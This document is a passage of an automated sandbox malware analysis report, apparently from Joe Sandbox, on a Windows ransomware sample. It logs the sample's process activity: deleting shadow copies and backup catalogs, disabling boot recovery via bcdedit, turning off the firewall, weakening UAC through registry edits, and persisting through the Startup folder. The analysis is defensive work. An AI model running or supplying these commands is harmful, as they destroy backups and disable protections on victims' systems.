                      Source: vssadmin.exe, 0000001C.00000002.276857396.000001EB8F390000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
                      Source: vssadmin.exe, 0000001C.00000002.276875819.000001EB8F3C4000.00000004.00000040.sdmpBinary or memory string: vssadmindeleteshadows/all/quiet
                      Source: vssadmin.exe, 0000001C.00000002.276815782.000001EB8F290000.00000004.00000020.sdmpBinary or memory string: C:\Users\user~1\AppData\Local\Temp\C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quietvssadmin delete shadows /all /quietWinsta0\Default}
                      Source: vssadmin.exe, 0000001C.00000002.276815782.000001EB8F290000.00000004.00000020.sdmpBinary or memory string: vssadmin delete shadows /all /quiet
                      Source: vssadmin.exe, 0000001C.00000002.276815782.000001EB8F290000.00000004.00000020.sdmpBinary or memory string: vssadmin delete shadows /all /quiet9
                      May disable shadow drive data (uses vssadmin)Show sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: bcdedit.exeProcess created: 41

                      System Summary:

                      barindex
                      Source: C:\Windows\System32\wbadmin.exeFile created: C:\Windows\Logs\WindowsBackup
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_0040F86A0_2_0040F86A
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_004118F00_2_004118F0
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_00410C900_2_00410C90
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_00410D590_2_00410D59
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_0040B9670_2_0040B967
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_004109700_2_00410970
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_00410D130_2_00410D13
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_004109900_2_00410990
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_0040EEA00_2_0040EEA0
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_0040CEB80_2_0040CEB8
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\19BE.tmp\aescrypt.exe B68FC901D758BA9EA3A5A616ABD34D1662197AA31B502F27CBF2579A947E53E9
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\539A.tmp\aescrypt.exe B68FC901D758BA9EA3A5A616ABD34D1662197AA31B502F27CBF2579A947E53E9
                      Source: C:\Windows\System32\wbengine.exeProcess token adjusted: Security
                      Source: 53c0505a_by_Libranalysis.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: aescrypt.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 53c0505a_by_Libranalysis.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: aescrypt.exe.18.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 53c0505a_by_Libranalysis.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f
                      Source: wbadmin.exe, 00000017.00000002.282868870.0000023682BCF000.00000004.00000020.sdmpBinary or memory string: ;.VBpF
                      Source: classification engineClassification label: mal100.rans.adwa.spyw.evad.winEXE@1706/21@0/1
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_00402664 LoadResource,SizeofResource,FreeResource,0_2_00402664
                      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_01
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeFile created: C:\Users\user\AppData\Local\Temp\19BE.tmpJump to behavior
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.bat C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe'
                      Source: C:\Windows\System32\bcdedit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\bcdedit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\bcdedit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\findstr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\netsh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\netsh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\netsh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\wbadmin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\wbadmin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\vdsldr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\bcdedit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\bcdedit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\bcdedit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\bcdedit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\bcdedit.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;taskmgr.exe&quot;)
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 53c0505a_by_Libranalysis.exeVirustotal: Detection: 41%
                      Source: 53c0505a_by_Libranalysis.exeReversingLabs: Detection: 46%
                      Source: unknownProcess created: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe 'C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe'
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.bat C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit off
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions off
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} bootems no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get caption
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /I /C:'10'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe'
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\539A.tmp\539B.tmp\539C.bat 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe''
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: unknownProcess created: C:\Windows\System32\wbengine.exe C:\Windows\system32\wbengine.exe
                      Source: unknownProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
                      Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit off
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions off
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} bootems no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /f
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.bat C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe'Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} bootems noJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled noJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get caption Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /I /C:'10'Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy deleteJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -EmbeddingJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
